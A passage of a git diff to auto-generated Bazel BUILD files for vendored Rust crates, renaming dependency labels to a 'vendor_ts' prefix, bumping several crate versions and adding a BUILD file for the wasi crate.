@@ -84,12 +84,12 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.22.22", + version = "0.22.24", deps = [ - "@vendor__indexmap-2.7.0//:indexmap", - "@vendor__serde-1.0.217//:serde", - "@vendor__serde_spanned-0.6.8//:serde_spanned", - "@vendor__toml_datetime-0.6.8//:toml_datetime", - "@vendor__winnow-0.6.24//:winnow", + "@vendor_ts__indexmap-2.7.0//:indexmap", + "@vendor_ts__serde-1.0.218//:serde", + "@vendor_ts__serde_spanned-0.6.8//:serde_spanned", + "@vendor_ts__toml_datetime-0.6.8//:toml_datetime", + "@vendor_ts__winnow-0.7.3//:winnow", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-0.1.41.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-0.1.41.bazel index d11310f4dbca..97ea0c0bd807 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-0.1.41.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-0.1.41.bazel @@ -37,7 +37,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2018", proc_macro_deps = [ - "@vendor__tracing-attributes-0.1.28//:tracing_attributes", + "@vendor_ts__tracing-attributes-0.1.28//:tracing_attributes", ], rustc_flags = [ "--cap-lints=allow", @@ -90,7 +90,7 @@ rust_library( }), version = "0.1.41", deps = [ - "@vendor__pin-project-lite-0.2.16//:pin_project_lite", - "@vendor__tracing-core-0.1.33//:tracing_core", + "@vendor_ts__pin-project-lite-0.2.16//:pin_project_lite", + "@vendor_ts__tracing-core-0.1.33//:tracing_core", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-attributes-0.1.28.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-attributes-0.1.28.bazel index 237a318293e8..b82896b5d1f0 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-attributes-0.1.28.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-attributes-0.1.28.bazel 
@@ -81,8 +81,8 @@ rust_proc_macro( }), version = "0.1.28", deps = [ - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-core-0.1.33.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-core-0.1.33.bazel index 4cd145f54f64..ce9e6c7f4862 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-core-0.1.33.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-core-0.1.33.bazel @@ -86,6 +86,6 @@ rust_library( }), version = "0.1.33", deps = [ - "@vendor__once_cell-1.20.2//:once_cell", + "@vendor_ts__once_cell-1.20.3//:once_cell", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-flame-0.2.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-flame-0.2.0.bazel index 978d69bb0ef3..bda5915465ae 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-flame-0.2.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-flame-0.2.0.bazel @@ -85,8 +85,8 @@ rust_library( }), version = "0.2.0", deps = [ - "@vendor__lazy_static-1.5.0//:lazy_static", - "@vendor__tracing-0.1.41//:tracing", - "@vendor__tracing-subscriber-0.3.19//:tracing_subscriber", + "@vendor_ts__lazy_static-1.5.0//:lazy_static", + "@vendor_ts__tracing-0.1.41//:tracing", + "@vendor_ts__tracing-subscriber-0.3.19//:tracing_subscriber", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-log-0.2.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-log-0.2.0.bazel index e6fe9ab8320b..da7b8a8bfc07 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-log-0.2.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-log-0.2.0.bazel 
@@ -85,8 +85,8 @@ rust_library( }), version = "0.2.0", deps = [ - "@vendor__log-0.4.22//:log", - "@vendor__once_cell-1.20.2//:once_cell", - "@vendor__tracing-core-0.1.33//:tracing_core", + "@vendor_ts__log-0.4.25//:log", + "@vendor_ts__once_cell-1.20.3//:once_cell", + "@vendor_ts__tracing-core-0.1.33//:tracing_core", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-subscriber-0.3.19.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-subscriber-0.3.19.bazel index 723df60eada8..e017d44b227a 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-subscriber-0.3.19.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tracing-subscriber-0.3.19.bazel @@ -99,15 +99,15 @@ rust_library( }), version = "0.3.19", deps = [ - "@vendor__matchers-0.1.0//:matchers", - "@vendor__nu-ansi-term-0.46.0//:nu_ansi_term", - "@vendor__once_cell-1.20.2//:once_cell", - "@vendor__regex-1.11.1//:regex", - "@vendor__sharded-slab-0.1.7//:sharded_slab", - "@vendor__smallvec-1.13.2//:smallvec", - "@vendor__thread_local-1.1.8//:thread_local", - "@vendor__tracing-0.1.41//:tracing", - "@vendor__tracing-core-0.1.33//:tracing_core", - "@vendor__tracing-log-0.2.0//:tracing_log", + "@vendor_ts__matchers-0.1.0//:matchers", + "@vendor_ts__nu-ansi-term-0.46.0//:nu_ansi_term", + "@vendor_ts__once_cell-1.20.3//:once_cell", + "@vendor_ts__regex-1.11.1//:regex", + "@vendor_ts__sharded-slab-0.1.7//:sharded_slab", + "@vendor_ts__smallvec-1.14.0//:smallvec", + "@vendor_ts__thread_local-1.1.8//:thread_local", + "@vendor_ts__tracing-0.1.41//:tracing", + "@vendor_ts__tracing-core-0.1.33//:tracing_core", + "@vendor_ts__tracing-log-0.2.0//:tracing_log", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-0.24.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-0.24.6.bazel index 4e7cb41b8117..aec9a765ca69 100644 
--- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-0.24.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-0.24.6.bazel @@ -86,11 +86,11 @@ rust_library( }), version = "0.24.6", deps = [ - "@vendor__regex-1.11.1//:regex", - "@vendor__regex-syntax-0.8.5//:regex_syntax", - "@vendor__streaming-iterator-0.1.9//:streaming_iterator", - "@vendor__tree-sitter-0.24.6//:build_script_build", - "@vendor__tree-sitter-language-0.1.3//:tree_sitter_language", + "@vendor_ts__regex-1.11.1//:regex", + "@vendor_ts__regex-syntax-0.8.5//:regex_syntax", + "@vendor_ts__streaming-iterator-0.1.9//:streaming_iterator", + "@vendor_ts__tree-sitter-0.24.6//:build_script_build", + "@vendor_ts__tree-sitter-language-0.1.3//:tree_sitter_language", ], ) @@ -147,7 +147,7 @@ cargo_build_script( version = "0.24.6", visibility = ["//visibility:private"], deps = [ - "@vendor__cc-1.2.7//:cc", + "@vendor_ts__cc-1.2.7//:cc", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-embedded-template-0.23.2.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-embedded-template-0.23.2.bazel index dd057689059b..e65ebd282658 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-embedded-template-0.23.2.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-embedded-template-0.23.2.bazel @@ -82,8 +82,8 @@ rust_library( }), version = "0.23.2", deps = [ - "@vendor__tree-sitter-embedded-template-0.23.2//:build_script_build", - "@vendor__tree-sitter-language-0.1.3//:tree_sitter_language", + "@vendor_ts__tree-sitter-embedded-template-0.23.2//:build_script_build", + "@vendor_ts__tree-sitter-language-0.1.3//:tree_sitter_language", ], ) @@ -135,7 +135,7 @@ cargo_build_script( version = "0.23.2", visibility = ["//visibility:private"], deps = [ - "@vendor__cc-1.2.7//:cc", + "@vendor_ts__cc-1.2.7//:cc", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-json-0.24.8.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-json-0.24.8.bazel index 8110b726022b..a5d58cfff1cd 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-json-0.24.8.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-json-0.24.8.bazel @@ -82,8 +82,8 @@ rust_library( }), version = "0.24.8", deps = [ - "@vendor__tree-sitter-json-0.24.8//:build_script_build", - "@vendor__tree-sitter-language-0.1.3//:tree_sitter_language", + "@vendor_ts__tree-sitter-json-0.24.8//:build_script_build", + "@vendor_ts__tree-sitter-language-0.1.3//:tree_sitter_language", ], ) @@ -135,7 +135,7 @@ cargo_build_script( version = "0.24.8", visibility = ["//visibility:private"], deps = [ - "@vendor__cc-1.2.7//:cc", + "@vendor_ts__cc-1.2.7//:cc", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-ql-0.23.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-ql-0.23.1.bazel index 981966e42287..404fe701044a 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-ql-0.23.1.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-ql-0.23.1.bazel @@ -82,8 +82,8 @@ rust_library( }), version = "0.23.1", deps = [ - "@vendor__tree-sitter-language-0.1.3//:tree_sitter_language", - "@vendor__tree-sitter-ql-0.23.1//:build_script_build", + "@vendor_ts__tree-sitter-language-0.1.3//:tree_sitter_language", + "@vendor_ts__tree-sitter-ql-0.23.1//:build_script_build", ], ) @@ -135,7 +135,7 @@ cargo_build_script( version = "0.23.1", visibility = ["//visibility:private"], deps = [ - "@vendor__cc-1.2.7//:cc", + "@vendor_ts__cc-1.2.7//:cc", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-ruby-0.23.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-ruby-0.23.1.bazel index e01e9bb737a3..71a3b2369845 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-ruby-0.23.1.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.tree-sitter-ruby-0.23.1.bazel @@ -82,8 +82,8 @@ rust_library( }), version = "0.23.1", deps = [ - "@vendor__tree-sitter-language-0.1.3//:tree_sitter_language", - "@vendor__tree-sitter-ruby-0.23.1//:build_script_build", + "@vendor_ts__tree-sitter-language-0.1.3//:tree_sitter_language", + "@vendor_ts__tree-sitter-ruby-0.23.1//:build_script_build", ], ) @@ -135,7 +135,7 @@ cargo_build_script( version = "0.23.1", visibility = ["//visibility:private"], deps = [ - "@vendor__cc-1.2.7//:cc", + "@vendor_ts__cc-1.2.7//:cc", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.triomphe-0.1.14.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.triomphe-0.1.14.bazel index cee5d9b5be6d..df6d10a847af 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.triomphe-0.1.14.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.triomphe-0.1.14.bazel @@ -87,7 +87,7 @@ rust_library( }), version = "0.1.14", deps = [ - "@vendor__serde-1.0.217//:serde", - "@vendor__stable_deref_trait-1.2.0//:stable_deref_trait", + "@vendor_ts__serde-1.0.218//:serde", + "@vendor_ts__stable_deref_trait-1.2.0//:stable_deref_trait", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.uncased-0.9.10.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.uncased-0.9.10.bazel index 3666af4b65a1..9f9e8eaaf6a4 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.uncased-0.9.10.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.uncased-0.9.10.bazel 
@@ -86,7 +86,7 @@ rust_library( }), version = "0.9.10", deps = [ - "@vendor__uncased-0.9.10//:build_script_build", + "@vendor_ts__uncased-0.9.10//:build_script_build", ], ) @@ -142,7 +142,7 @@ cargo_build_script( version = "0.9.10", visibility = ["//visibility:private"], deps = [ - "@vendor__version_check-0.9.5//:version_check", + "@vendor_ts__version_check-0.9.5//:version_check", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.unicode-ident-1.0.14.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.unicode-ident-1.0.16.bazel similarity index 99% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.unicode-ident-1.0.14.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.unicode-ident-1.0.16.bazel index 3caee39efcce..f1e1eea9fb4f 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.unicode-ident-1.0.14.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.unicode-ident-1.0.16.bazel @@ -79,5 +79,5 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "1.0.14", + version = "1.0.16", ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.valuable-0.1.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.valuable-0.1.0.bazel index a9cceb25bed8..a8fe7b8a667e 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.valuable-0.1.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.valuable-0.1.0.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.1.0", deps = [ - "@vendor__valuable-0.1.0//:build_script_build", + "@vendor_ts__valuable-0.1.0//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.walkdir-2.5.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.walkdir-2.5.0.bazel index 0cac3017546d..6162d18a3cc4 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.walkdir-2.5.0.bazel 
+++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.walkdir-2.5.0.bazel @@ -81,16 +81,16 @@ rust_library( }), version = "2.5.0", deps = [ - "@vendor__same-file-1.0.6//:same_file", + "@vendor_ts__same-file-1.0.6//:same_file", ] + select({ "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__winapi-util-0.1.9//:winapi_util", # cfg(windows) + "@vendor_ts__winapi-util-0.1.9//:winapi_util", # cfg(windows) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__winapi-util-0.1.9//:winapi_util", # cfg(windows) + "@vendor_ts__winapi-util-0.1.9//:winapi_util", # cfg(windows) ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__winapi-util-0.1.9//:winapi_util", # cfg(windows) + "@vendor_ts__winapi-util-0.1.9//:winapi_util", # cfg(windows) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasi-0.13.3+wasi-0.2.2.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasi-0.13.3+wasi-0.2.2.bazel new file mode 100644 index 000000000000..62578b6a312b --- /dev/null +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasi-0.13.3+wasi-0.2.2.bazel 
@@ -0,0 +1,86 @@ +############################################################################### +# @generated +# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To +# regenerate this file, run the following: +# +# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors +############################################################################### + +load("@rules_rust//rust:defs.bzl", "rust_library") + +package(default_visibility = ["//visibility:public"]) + +rust_library( + name = "wasi", + srcs = glob( + include = ["**/*.rs"], + allow_empty = True, + ), + compile_data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + crate_root = "src/lib.rs", + edition = "2021", + rustc_flags = [ + "--cap-lints=allow", + ], + tags = [ + "cargo-bazel", + "crate-name=wasi", + "manual", + "noclippy", + "norustfmt", + ], + target_compatible_with = select({ + "@rules_rust//rust/platform:aarch64-apple-darwin": [], + "@rules_rust//rust/platform:aarch64-apple-ios": [], + "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], + "@rules_rust//rust/platform:aarch64-linux-android": [], + "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], + "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], + "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], + "@rules_rust//rust/platform:aarch64-unknown-uefi": [], + "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:armv7-linux-androideabi": [], + "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:i686-apple-darwin": [], + "@rules_rust//rust/platform:i686-linux-android": [], + "@rules_rust//rust/platform:i686-pc-windows-msvc": [], + 
"@rules_rust//rust/platform:i686-unknown-freebsd": [], + "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], + "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], + "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], + "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], + "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], + "@rules_rust//rust/platform:thumbv7em-none-eabi": [], + "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], + "@rules_rust//rust/platform:wasm32-unknown-unknown": [], + "@rules_rust//rust/platform:wasm32-wasip1": [], + "@rules_rust//rust/platform:x86_64-apple-darwin": [], + "@rules_rust//rust/platform:x86_64-apple-ios": [], + "@rules_rust//rust/platform:x86_64-linux-android": [], + "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], + "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], + "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], + "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-none": [], + "@rules_rust//rust/platform:x86_64-unknown-uefi": [], + "//conditions:default": ["@platforms//:incompatible"], + }), + version = "0.13.3+wasi-0.2.2", + deps = [ + "@vendor_ts__wit-bindgen-rt-0.33.0//:wit_bindgen_rt", + ], +) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-0.2.99.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-0.2.99.bazel index 13e98ffd7af3..52ec9171a917 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-0.2.99.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-0.2.99.bazel @@ -37,7 +37,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2021", proc_macro_deps = [ - "@vendor__wasm-bindgen-macro-0.2.99//:wasm_bindgen_macro", + "@vendor_ts__wasm-bindgen-macro-0.2.99//:wasm_bindgen_macro", ], rustc_flags = [ "--cap-lints=allow", 
@@ -90,9 +90,9 @@ rust_library( }), version = "0.2.99", deps = [ - "@vendor__cfg-if-1.0.0//:cfg_if", - "@vendor__once_cell-1.20.2//:once_cell", - "@vendor__wasm-bindgen-0.2.99//:build_script_build", + "@vendor_ts__cfg-if-1.0.0//:cfg_if", + "@vendor_ts__once_cell-1.20.3//:once_cell", + "@vendor_ts__wasm-bindgen-0.2.99//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-backend-0.2.99.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-backend-0.2.99.bazel index 63a6bbad2db6..8e6b5f0e47a7 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-backend-0.2.99.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-backend-0.2.99.bazel @@ -85,11 +85,11 @@ rust_library( }), version = "0.2.99", deps = [ - "@vendor__bumpalo-3.16.0//:bumpalo", - "@vendor__log-0.4.22//:log", - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", - "@vendor__wasm-bindgen-shared-0.2.99//:wasm_bindgen_shared", + "@vendor_ts__bumpalo-3.16.0//:bumpalo", + "@vendor_ts__log-0.4.25//:log", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", + "@vendor_ts__wasm-bindgen-shared-0.2.99//:wasm_bindgen_shared", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-macro-0.2.99.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-macro-0.2.99.bazel index 548b449cf6fb..c0b07b27ac27 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-macro-0.2.99.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-macro-0.2.99.bazel 
@@ -85,7 +85,7 @@ rust_proc_macro( }), version = "0.2.99", deps = [ - "@vendor__quote-1.0.38//:quote", - "@vendor__wasm-bindgen-macro-support-0.2.99//:wasm_bindgen_macro_support", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__wasm-bindgen-macro-support-0.2.99//:wasm_bindgen_macro_support", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-macro-support-0.2.99.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-macro-support-0.2.99.bazel index 2d299b317f80..97d5fe34087e 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-macro-support-0.2.99.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-macro-support-0.2.99.bazel @@ -85,10 +85,10 @@ rust_library( }), version = "0.2.99", deps = [ - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", - "@vendor__wasm-bindgen-backend-0.2.99//:wasm_bindgen_backend", - "@vendor__wasm-bindgen-shared-0.2.99//:wasm_bindgen_shared", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", + "@vendor_ts__wasm-bindgen-backend-0.2.99//:wasm_bindgen_backend", + "@vendor_ts__wasm-bindgen-shared-0.2.99//:wasm_bindgen_shared", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-shared-0.2.99.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-shared-0.2.99.bazel index 2842ddd46580..c22eb09d6269 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-shared-0.2.99.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasm-bindgen-shared-0.2.99.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.2.99", deps = [ - "@vendor__wasm-bindgen-shared-0.2.99//:build_script_build", + "@vendor_ts__wasm-bindgen-shared-0.2.99//:build_script_build", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-0.3.9.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-0.3.9.bazel index 6a1b6359aa4b..d80dd87d6905 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-0.3.9.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-0.3.9.bazel @@ -89,7 +89,7 @@ rust_library( }), version = "0.3.9", deps = [ - "@vendor__winapi-0.3.9//:build_script_build", + "@vendor_ts__winapi-0.3.9//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-i686-pc-windows-gnu-0.4.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-i686-pc-windows-gnu-0.4.0.bazel index b4756544ab6e..2251d0123cd5 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-i686-pc-windows-gnu-0.4.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-i686-pc-windows-gnu-0.4.0.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.4.0", deps = [ - "@vendor__winapi-i686-pc-windows-gnu-0.4.0//:build_script_build", + "@vendor_ts__winapi-i686-pc-windows-gnu-0.4.0//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-util-0.1.9.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-util-0.1.9.bazel index 74cade3e6823..cdb2fccbf698 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-util-0.1.9.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-util-0.1.9.bazel 
@@ -82,13 +82,13 @@ rust_library( version = "0.1.9", deps = select({ "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-x86_64-pc-windows-gnu-0.4.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-x86_64-pc-windows-gnu-0.4.0.bazel index 3a0a95027ff6..4de908b91117 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-x86_64-pc-windows-gnu-0.4.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.winapi-x86_64-pc-windows-gnu-0.4.0.bazel @@ -82,7 +82,7 @@ rust_library( }), version = "0.4.0", deps = [ - "@vendor__winapi-x86_64-pc-windows-gnu-0.4.0//:build_script_build", + "@vendor_ts__winapi-x86_64-pc-windows-gnu-0.4.0//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-core-0.52.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-core-0.52.0.bazel index e55c7e5da8d1..89ebc463e004 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-core-0.52.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.windows-core-0.52.0.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "0.52.0", deps = [ - "@vendor__windows-targets-0.52.6//:windows_targets", + "@vendor_ts__windows-targets-0.52.6//:windows_targets", ], ) 
